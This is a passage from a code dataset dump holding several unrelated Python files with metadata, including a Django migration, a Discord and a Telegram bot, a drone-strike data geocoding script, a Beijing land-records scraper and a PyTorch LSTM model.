(b_i + 1) * dim] = Y\n\t\t\tdata_xy[batch_id] = (concat_X, concat_Y, mask, len(batch_x), np.array(batch_paragraph_info))\n\t\t\tbatch_x = []\n\t\t\tbatch_y = []\n\t\t\tbatch_paragraph_info = []\n\t\t\tseqs_len = []\n\t\t\tbatch_id += 1\n\treturn data_xy\n\nif __name__ == '__main__':\n\tbase_path = \"../data/TAC2011/Amish Shooting\"\n\ti2w, w2i, sents, lines, w_pos, w_concept, entities = load(base_path)", "sub_path": "data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 6875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 12, "usage_type": "call"}, {"api_name": "pkgutil.walk_packages", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "encodings.__file__", "line_number": 20, "usage_type": "attribute"}, {"api_name": "encodings.aliases.aliases.values", "line_number": 21, "usage_type": "call"}, {"api_name": "encodings.aliases", "line_number": 21, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 25, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 117, "usage_type": "attribute"}, {"api_name": "torch.norm", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 195, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 226, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 242, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 256, "usage_type": "call"}]} +{"seq_id": "336355887", "text": "import pandas as pd \nfrom skimage import io\nimport pickle\n\nreviews = pd.read_csv('4_15_2019.tsv', sep='\\t')\ndf_reviews = reviews[['shoeName','shoe_image']]\ndictionary = {}\nfor i in range(10):\n\tshoe_name = df_reviews.iloc[i][\"shoeName\"]\n\tshoe_image = df_reviews.iloc[i][\"shoe_image\"]\n\tshoe_image_array = io.imread(shoe_image)[:, :, :-1]\n\tdictionary[shoe_name] = shoe_image_array\nprint(len(dictionary))\npickle.dump( dictionary, open( \"shoes_images.p\", \"wb\" ) )\n\n", "sub_path": "app/images_to_bytes.py", "file_name": "images_to_bytes.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 11, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "611723062", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0003_auto_20151112_0212'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BoyGirlQuestion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('choice', models.BooleanField(default=False, choices=[(0, b'Boy'), (1, b'Girl')])),\n ('name', models.CharField(max_length=60)),\n ],\n ),\n migrations.RemoveField(\n model_name='choice',\n name='question',\n ),\n migrations.DeleteModel(\n name='Choice',\n ),\n migrations.DeleteModel(\n name='Question',\n ),\n ]\n", "sub_path": "core/migrations/0004_auto_20151114_0225.py", "file_name": "0004_auto_20151114_0225.py", "file_ext": "py", "file_size_in_byte": 883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.DeleteModel", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.migrations.DeleteModel", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "224196419", "text": "from enum import Enum\n\nfrom gi.repository import GLib\n# importing the necessary libraries\n\n#class enumerates the types of media that can be displayed\t\nclass media_type_t(Enum):\n\tMEDIA_TYPE_QRCODE = 0\n\tMEDIA_TYPE_IMAGE = 1\n\tMEDIA_TYPE_GIF = 2\n\n\n\n\n#class enumerates the types of screens\nclass screen_type_t(Enum):\n\tSCREEN_TYPE_S1 = 0\n\tSCREEN_TYPE_S2 = 1\n\n\n\n\n#class enumerates the types of cards\nclass card_type_t(Enum):\n\tCARD_TYPE_W100_BLUE_SPALSH = 0\n\tCARD_TYPE_W100_GRAY_MEDIA = 1\n\tCARD_TYPE_W100_GRAY_STRING3 = 2\n\tCARD_TYPE_W100_GRAY_MEDIA_STRING3 = 3\n\tCARD_TYPE_W100_RED_MEDIA_STRING3 = 4\n\tCARD_TYPE_W100_USERCOLOR_MEDIA_STRING_3 = 5\n\tCARD_TYPE_W50_RED_MEDIA_STRING2 = 6\n\tCARD_TYPE_W50_AMBER_MEDIA_STRING2 = 7\n\tCARD_TYPE_W50_GRAY_MEDIA_STRING2 = 8\n\tCARD_TYPE_W50_GREEN_MEDIA_STRING2 = 9\n\tCARD_TYPE_W50_BLUE_MEDIA_STRING2 = 10\n\tCARD_TYPE_W50_USERCOLOR_MEDIA_STRING2 = 11\n\tCARD_TYPE_W50_GREEN_TITLE_STRING4 = 12\n\tCARD_TYPE_W50_GREEN_TITLE_STRING3 = 13\n\n\n\n\n\nclass screen_ui_t(): \n\n\t\tdef __init__(self):\n\t\t\t#instatiating the station info class\n\t\t\tself.Station_Info = station_info_t()\n\t\t\tself.Header_Vis = header_visibility\n\t\t\tself.Card_UI_T = card_ui_t\n\n\n\n\t\t\n\n\t\t\"\"\"\n\t\tObject 1\n\t\t\tThis reads the type of screen from the user\n\t\t\"\"\"\n\t\tchoice = int(input('Enter a screen type (0=TYPE_S1/1=TYPE_S2): '))\n\t\tif choice == 0:\n\t\t\tprint('Screen set to: {}\\n'.format(screen_type_t.SCREEN_TYPE_S1))\n\t\telif choice == 1:\n\t\t\tprint('Screen set to: {}\\n'.format(screen_type_t.SCREEN_TYPE_S2))\n\t\telse:\n\t\t\tprint('Invalid input\\n')\n\n\n\n\t\t\n\n\t\t\"\"\"\n\t\tObject 2\n\t\t\tThis reads and sets the Station's Serial Address\n\t\t\"\"\"\n\t\tclass station_info_t:\n\t\t\tserial = str(input('Enter Serial number of station: '))\n\t\t\t#reads Serial number of the station\n\t\t\tprint('Serial address set as: {}\\n'.format(serial))\n\t\t\t\n\n\n\n\n\t\t\"\"\"\n\t\tObject 3\n\t\t\tThis sets or clears the header visiblity on the screen\n\t\t\"\"\"\n\t\theader = int(input('Header visibility (0=HIDE/1=SHOW): '))\n\t\t#reads the choice to show or hide header (sets Bool values based on user choice)\n\t\tif header == 0:\n\t\t\theader_visibility = False\n\t\t\tprint('Header set to HIDE\\n')\n\t\telif header == 1:\n\t\t\theader_visibility = True\n\t\t\tprint('Header set to SHOW\\n')\n\t\telse:\n\t\t\tprint('Invalid input\\n')\n\t\t\texit()\n\t\t\n\t\t\n\n\n\n\n\t\t\"\"\"\n\t\tObject 4\n\t\t\tThis reads Card parameters from the user and sets the same to each card\n\t\t\"\"\"\n\t\tclass card_ui_t:\n\n\n\t\t\t#parameter 1\n\t\t\ti = 0 #to display count of ENUM listing\n\t\t\tfor types in card_type_t:\n\t\t\t\tprint('{}'.format(i), types)\n\t\t\t\ti += 1\n\t\t\ttry:\n\t\t\t\tcard_type = int(input('Enter ENUM index (0-13)\\nSelect Card type: '))\n\t\t\t\t#reads card type from user\n\t\t\t\t#assigns through ENUM index\n\t\t\t\tprint('Card type set to: ')\n\t\t\t\tprint(card_type_t(card_type))\n\t\t\texcept:\n\t\t\t\tprint('Input value does not match any defined card types')\n\t\t\t\texit()\n\t\t\t\t\n\t\t\t\n\t\t\t#parameter 2\n\t\t\t#this parameter is read only if the user chooses \n\t\t\t#5 card_type_t.CARD_TYPE_W100_USERCOLOR_MEDIA_STRING_3 or \n\t\t\t#11 card_type_t.CARD_TYPE_W50_USERCOLOR_MEDIA_STRING2\n\t\t\tif card_type == 5 or card_type == 11:\n\t\t\t\tcard_bgcolor = int(input('\\nEnter Background Color: '))\n\t\t\t\t#reads background color from user\n\t\t\t\t#assumed to be a integer value\n\t\t\t\tprint('Background color set to: {}\\n'.format(card_bgcolor))\n\t\t\telse:\n\t\t\t\tprint('Background color set by default as per card formatting\\n')\n\n\n\t\t\t#parameter 3\n\t\t\tslot_index = int(input('Enter the slot index (0=LEFT/1=RIGHT): '))\n\t\t\tprint('Slot index set as: {}\\n'.format(slot_index))\n\t\t\t\n\n\n\t\t\t#parameter 4\n\t\t\tchoice = int(input('FLIPPER Visibility (0=HIDE/1=SHOW): '))\n\t\t\t#reads users choice to either show or hide flipper.\n\t\t\t#sets Bool value appropriately\n\t\t\tif choice == 0:\n\t\t\t\tflipper_visibility = False\n\t\t\t\tprint('Flipper set to HIDE\\n')\n\t\t\telif choice == 1:\n\t\t\t\tflipper_visibility = True\n\t\t\t\tprint('Flipper set to SHOW\\n')\n\t\t\telse:\n\t\t\t\tprint('Invalid choice\\n')\n\t\t\t\texit()\n\t\t\t\n\n\n\t\t\t#parameter 4\n\t\t\tflipper_index = int(input('Enter the flipper index: '))\n\t\t\t#reads index of Flipper from user\n\t\t\tprint('Flipper index set to: {}\\n'.format(flipper_index))\n\t\t\t\n\n\n\n\t\t\t#parameter 5\n\t\t\ti = 0\t#to display count of ENUM listing\n\t\t\tfor media in media_type_t:\n\t\t\t\tprint('{}'.format(i), media)\n\t\t\t\ti += 1\n\t\t\tmedia_type = int(input('Enter ENUM index (0-2)\\nSelect Media type: '))\n\t\t\t#reads the media type from user through ENUM index\n\t\t\tprint('Media type set to: ')\n\t\t\tprint(media_type_t(media_type))\n\t\t\t\n\t\t\t#parameter 6 hardcoded now as recommended\n\t\t\tif media_type == 0:\n\t\t\t\tmedia_path = \"directory0/directory1/directory4/QR_file.ext\"\n\t\t\t\tprint('\\nMedia Path set to: {}\\n'.format(media_path))\n\t\t\telif media_type == 1:\n\t\t\t\tmedia_path = \"directory0/directory1/directory4/IMAGE_file.ext\"\n\t\t\t\tprint('\\nMedia Path set to: {}\\n'.format(media_path))\n\t\t\telif media_type == 2:\n\t\t\t\tmedia_path = \"directory0/directory1/directory4/GIF_file.ext\"\n\t\t\t\tprint('\\nMedia Path set to: {}\\n'.format(media_path))\n\t\t\telse:\n\t\t\t\tprint('Invalid Media Type\\n')\n\t\t\t\texit()\n\t\t\t\n\t\t\t\n\t\t\t#parameter 7\n\t\t\t#reads the title for the card selected \n\t\t\ttitle = str(input('Enter the title of card {}: '.format(slot_index)))\n\t\t\tprint('Title for Card {} set as: {}'.format(slot_index,title))\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t#parameter 8,9,10,11\n\t\t\t#Only strings relevant to the user selected cards are read.\n\t\t\t#Other strings are ignored\n\t\t\t#cards 1 and 2 expect no string\n\t\t\tif card_type == 2 or card_type == 3 or card_type == 4 or card_type == 5 or card_type == 13:\n\t\t\t#cards 2, 3, 4 5 and 13 expect 3 strings\n\t\t\t\tprint('Selected card {} expects 3 strings\\n'.format(card_type_t(card_type)))\n\t\t\t\tstring1 = str(input('Enter string 1: '))\n\t\t\t\tstring2 = str(input('Enter string 2: '))\n\t\t\t\tstring3 = str(input('Enter string 3: '))\n\t\t\t\t\n\t\t\t\tprint('String 1: {}\\nString 2: {}\\nString 3: {}'.format(string1, string2, string3))\n\n\t\t\telif card_type == 6 or card_type == 7 or card_type == 8 or card_type == 9 or card_type == 10 or card_type == 11:\n\t\t\t#cards 6, 7, 8, 9, 10, 11 expect 2 strings\n\t\t\t\tprint ('Selected card {} expects 2 strings\\n'.format(card_type_t(card_type)))\n\t\t\t\tstring1 = str(input('Enter string 1: '))\n\t\t\t\tstring2 = str(input('Enter string 2: '))\n\n\t\t\t\tprint('String 1: {}\\nString 2: {}\\nString 3: {}'.format(string1, string2, string3))\n\t\t\t\t\n\t\t\telif card_type == 12:\n\t\t\t\tprint('Selected card {} expects 4 strings\\n'.format(card_type_t(card_type)))\n\t\t\t\tstring1 = str(input('Enter string 1: '))\n\t\t\t\tstring2 = str(input('Enter string 2: '))\n\t\t\t\tstring3 = str(input('Enter string 3: '))\n\t\t\t\tstring4 = str(input('Enter string 4: '))\n\t\t\t\t\n\t\t\t\tprint('String 1: {}\\nString 2: {}\\nString 3: {}\\nString 4: {}'.format(string1, string2, string3, string4))\n\t\t\t\n\t\t\telse: \n\t\t\t\tprint('Selected card {} doesnot expect any strings\\n'.format(card_type_t(card_type)))\n", "sub_path": "Client_V1.0.py", "file_name": "Client_V1.0.py", "file_ext": "py", "file_size_in_byte": 6631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 16, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "152763347", "text": "import discord\ndef do():\n from uni_network import uni_class, log\n bot = uni_class.bot\n @bot.event\n async def on_ready():\n # 화면에 봇의 아이디, 닉네임이 출력됩니다.\n print(\"=============================================\")\n print(\"Discord Started as ...\")\n print(\"bot name : \" + str(bot.user.name))\n print(\"bot id : \" + str(bot.user.id))\n print(\"=============================================\")\n activity = discord.Game(name=\"🔎/help\")\n await bot.change_presence(status=discord.Status.online, activity=activity)\n return", "sub_path": "uni_network/Utility/Event/bot_on.py", "file_name": "bot_on.py", "file_ext": "py", "file_size_in_byte": 612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "uni_network.uni_class.bot", "line_number": 4, "usage_type": "attribute"}, {"api_name": "uni_network.uni_class", "line_number": 4, "usage_type": "name"}, {"api_name": "discord.Game", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.Status", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "410501247", "text": "# coding=utf-8\nimport io\nimport json\nimport os\nfrom functools import lru_cache\n\nimport feather\nimport pandas as pd\nimport requests\nfrom geopy.geocoders import Nominatim\nfrom tqdm import tqdm\n\ngeolocator = Nominatim()\n\n\ndef public_google_sheet_reader(file_id, sheet_id):\n \"\"\"\n Will take parts of a url and return a pandas dataframe\n\n Research:\n Surprisingly difficult to figure out the format for the URL\n\n Sources:\n http://www.madhur.co.in/blog/2016/05/13/google-docs-spreadsheet.html\n https://gist.github.com/cspickert/1650271\n\n Example:\n For a URL https://docs.google.com/spreadsheets/d/1Q1eBZ275Znlpn05PnPO7Q1BkI3yJZbvB3JycywAmqWc/edit#gid=1283746305\n\n file_id = '1Q1eBZ275Znlpn05PnPO7Q1BkI3yJZbvB3JycywAmqWc'\n sheet_id = 1283746305\n\n :param file_id: string\n :param sheet_id: string\n :return: pd.Dataframe()\n \"\"\"\n url = f\"https://docs.google.com/spreadsheets/d/{file_id}/export?format=csv&id={file_id}&gid={sheet_id}\"\n r = requests.get(url)\n sio = io.StringIO(r.text, newline=None)\n df = pd.read_csv(sio)\n columns = ['strike', 'date', 'village', 'district', 'province', 'attack_type', 'is_drone', 'confirmed_us',\n 'only_us',\n 'reason', 'reported_target_group', 'time', 'reported_target_type', 'minimum_strikes', 'maximum_strikes',\n 'minimum_total_people_killed', 'maximum_total_people_killed', 'minimum_civilians_reported_killed',\n 'maximum_civilians_reported_killed', 'minimum_children_reported_killed',\n 'maximum_children_reported_killed',\n 'minimum_reported_injured', 'maximum_reported_injured', 'strike_link', 'timeline_url', 'index']\n df.columns = columns\n return df.iloc[:-1, :]\n\n\n@lru_cache()\ndef get_location(geo: Nominatim, loc: str) -> tuple:\n \"\"\"\n Will attempt to retrieve location with as much information as possible. If geocoder doesnt understand the string\n get_location will reduce the string to remove the most specific information in the location string.\n :rtype: tuple\n :type geo: Nominatim\n :type loc: str\n :param geo: The Nomatim() type... I might need to find a better place for this\n :param loc: The location that you want to look up\n :return: A tuple with lat and long then the passed in location and the address from the geocoder.\n \"\"\"\n\n try:\n result = geolocator.geocode(loc)\n coordinates = (result.latitude, result.longitude, loc, result.address)\n print(loc, result.address)\n except AttributeError:\n return get_location(geo, loc.split(' ', 1)[-1])\n return coordinates\n\n\ndef create_data_frame(output_path):\n global geolocator\n afghanistan_file_id = \"1Q1eBZ275Znlpn05PnPO7Q1BkI3yJZbvB3JycywAmqWc\"\n data_sheet_id = '0'\n df = public_google_sheet_reader(afghanistan_file_id, data_sheet_id)\n # There are some incorrect location names as far as the geocoder is concerned\n # The following dictionary and for loops are to fix that\n replace_village = {}\n replace_district = {\n 'Lal Pura': 'Lal Pur'\n }\n replace_province = {}\n replace_structure = {\n 'village': replace_village,\n 'district': replace_district,\n 'province': replace_province,\n }\n for col, replace_dict in replace_structure.items():\n if not replace_dict:\n continue\n for old, new in replace_dict.items():\n df[col].replace(old, new)\n geocoding_series = []\n loc_string_series = []\n coords_json = 'geocode.json'\n with open(coords_json, 'r') as fp:\n geocode_dict = json.load(fp)\n for index, row in tqdm(df.iterrows()):\n # *coords, loc, address = [None] * 4\n village = '' if any(word in row['village'] for word in ['-', 'Unknown', ',']) else row[\n 2].strip() + ', '\n district = '' if any(word in row['district'] for word in ['-', 'Unknown', ',']) else row[3].strip() + ', '\n province = '' if any(word in row['province'] for word in ['-', 'Unknown', ',']) else row[4].strip() + ', '\n loc_string = '{}{}{}Afghanistan'.format(village, district, province)\n if loc_string not in geocode_dict.keys():\n *coords, loc, geo_address = get_location(geolocator, loc_string)\n else:\n coords = geocode_dict[loc_string]\n loc_string_series.append(loc_string)\n geocoding_series.append(coords)\n geocode_dict[loc_string] = coords\n with open(coords_json, 'w') as fp:\n json.dump(geocode_dict, fp)\n df['loc_string'] = loc_string_series\n df['lat'] = [x[0] for x in geocoding_series]\n df['lon'] = [x[1] for x in geocoding_series]\n print(f'Writing feather file to: {output_path}')\n feather.write_dataframe(df, output_path)\n\n\nif __name__ == '__main__':\n data_frame_path = os.path.join(os.path.dirname(__file__), os.pardir, 'data', 'us_strikes.feather')\n create_data_frame(data_frame_path)\n", "sub_path": "Python/get_data.py", "file_name": "get_data.py", "file_ext": "py", "file_size_in_byte": 5004, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "geopy.geocoders.Nominatim", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 40, "usage_type": "call"}, {"api_name": "geopy.geocoders.Nominatim", "line_number": 53, "usage_type": "name"}, {"api_name": "functools.lru_cache", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 100, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 101, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 116, "usage_type": "call"}, {"api_name": "feather.write_dataframe", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 125, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 125, "usage_type": "attribute"}]} +{"seq_id": "105962061", "text": "import botogram\r\nimport requests\r\nimport socket\r\n\r\ndef loadVar(file):\r\n with open(file, \"r\") as file:\r\n var = str(file.read()).rstrip(\"\\n\")\r\n return var\r\n\r\ntoken = loadVar(\"assets/token.txt\")\r\nbot = botogram.create(token)\r\n\r\nif __name__ == \"__main__\":\r\n channelToken = loadVar(\"assets/channelToken.txt\")\r\n IPAddr = socket.gethostbyname(socket.gethostname())\r\n ip = requests.get('https://checkip.amazonaws.com').text.strip()\r\n bot.chat(channelToken).send(str(IPAddr) + \" | \" + str(ip) + \" listening!\")\r\n", "sub_path": "BEA/bots/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "botogram.create", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.gethostbyname", "line_number": 15, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "104853248", "text": "import os\nimport time\nimport json\nimport urllib\nimport urllib3\nimport requests\nimport random\n\nimport pandas as pd\n\n\nclass Query(object):\n def get_session(self):\n \"\"\"创建 session 示例,以应对多线程\"\"\"\n\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n # 设置重连次数\n requests.adapters.DEFAULT_RETRIES = 10\n # 设置连接活跃状态为False\n session = requests.session()\n session.keep_alive = False\n session.verify = False\n\n adapter = requests.adapters.HTTPAdapter(max_retries=3)\n # 将重试规则挂载到http和https请求\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n\n return session\n\n def deal_re(self, byte=False, need_header=False, **kwargs):\n \"\"\"requests of get\"\"\"\n\n url = kwargs.get(\"url\")\n header = kwargs.get(\"header\")\n try:\n data = kwargs.get(\"data\")\n except:\n data = None\n files = kwargs.get(\"files\")\n\n sesscion_a = self.get_session()\n\n print(\"---> 开始请求网址:{}\".format(url))\n start_time = time.time()\n retry_count = 5\n while retry_count > 0:\n try:\n\n if isinstance(data, dict):\n resp = sesscion_a.post(\n url,\n headers=header,\n data=json.dumps(data),\n timeout=(10, 60))\n elif isinstance(files, dict):\n resp = sesscion_a.post(url, files=files, timeout=(10, 60))\n elif data:\n resp = sesscion_a.post(\n url, headers=header, data=data, timeout=(10, 60))\n else:\n resp = sesscion_a.get(\n url,\n headers=header,\n allow_redirects=False,\n timeout=(10, 60))\n retry_count = 0\n except Exception as exc:\n retry_count -= 1\n\n end_time = time.time()\n\n try:\n if resp.status_code == 200:\n magic_time = end_time - start_time\n return resp\n else:\n print(\"--->Info {} 请求失败!状态码为{},共耗时{:.3}秒\".format(\n url, resp.status_code, end_time - start_time))\n except UnboundLocalError as exc:\n print(\"--->Error: deal re is error, the error is {}\".format(exc))\n return None\n\n def run(self, path, sign=None, header={}, **kwargs):\n resp = self.deal_re(url=path, header=header, **kwargs)\n if sign:\n return resp.content\n else:\n return resp.text\n\n\nclass DealGhzrzyw(object):\n def __init__(self):\n self.url = \"http://ghzrzyw.beijing.gov.cn/sjzy/front/landsold/oprcadastral.do?iid={}\"\n self.header = {\n \"Host\": \"ghzrzyw.beijing.gov.cn\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\":\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36\",\n \"Accept\":\n \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\"\n }\n self.info = pd.DataFrame()\n self.request = Query()\n self.run()\n\n def main(self, path):\n resp = self.request.run(path, header=self.header)\n info_ = {}\n for data in pd.read_html(resp)[-1].values:\n key = data[0].replace(\":\", \"\")\n value = data[-1]\n if \"浏览次数\" in key:\n key = \"浏览次数\"\n value = value.replace(\"浏览次数:\", \"\")\n elif key == \"返回\":\n continue\n info_[key] = value\n self.info = self.info.append(info_, ignore_index=True)\n\n def run(self):\n try:\n for page in range(9000):\n self.main(self.url.format(page + 1))\n time.sleep(random.randint(0, 5))\n self.info.to_excel(\"./data.xlsx\", index=False)\n except Exception as exc:\n self.info.to_excel(\"./dirty_data.xlsx\", index=False)\n print(\"---> Error: the error is {}, the page is {}\".format(exc, page))\n\n\nif __name__ == \"__main__\":\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n DealGhzrzyw()", "sub_path": "successed/8.26/ghzrzyw/spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 4585, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 16, "usage_type": "attribute"}, {"api_name": "requests.adapters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "requests.session", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.adapters.HTTPAdapter", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.adapters", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 128, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 128, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "150214178", "text": "import torch\nimport torch.nn as nn\nimport torch.autograd as autograd\n\n\n\nclass ReinforcedLSTM(nn.Module):\n def __init__(self, IMAGE_SIZE, HIDDEN_NODES, HIDDEN_LAYERS, OUTPUT_CLASSES, BATCH_SIZE, CUDA):\n super(ReinforcedLSTM, self).__init__()\n\n # Parameters\n self.image_size = IMAGE_SIZE\n self.hidden_nodes = HIDDEN_NODES\n self.hidden_layers = HIDDEN_LAYERS\n self.output_size = OUTPUT_CLASSES\n self.gpu = CUDA\n\n print(\"Model Input Size: \", str(self.image_size + self.output_size))\n print(\"Model Output Size: \", str(self.output_size + 1))\n\n # Architecture\n self.lstm = nn.LSTM(self.image_size + self.output_size, self.hidden_nodes)\n self.hidden2probs = nn.Linear(self.hidden_nodes, self.output_size + 1)\n\n\n def init_hidden(self, batch_size):\n if (self.gpu):\n h0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes)).cuda()\n c0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes)).cuda()\n else:\n h0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes))\n c0 = autograd.Variable(torch.zeros(self.hidden_layers, batch_size, self.hidden_nodes))\n\n return (h0, c0)\n\n # Not sure if necessary:\n def reset_hidden(self, batch_size):\n hidden = self.init_hidden(batch_size)\n return (hidden[0].detach(), hidden[1].detach())\n\n \n def forward(self, x, hidden, seq=1):\n batch_size = hidden[1].size()[1]\n x = x.view(seq, batch_size, -1)\n lstm_out, next_hidden = self.lstm(x, hidden)\n x = self.hidden2probs(lstm_out[-1])\n return x, next_hidden\n", "sub_path": "reinforcement/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1732, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": 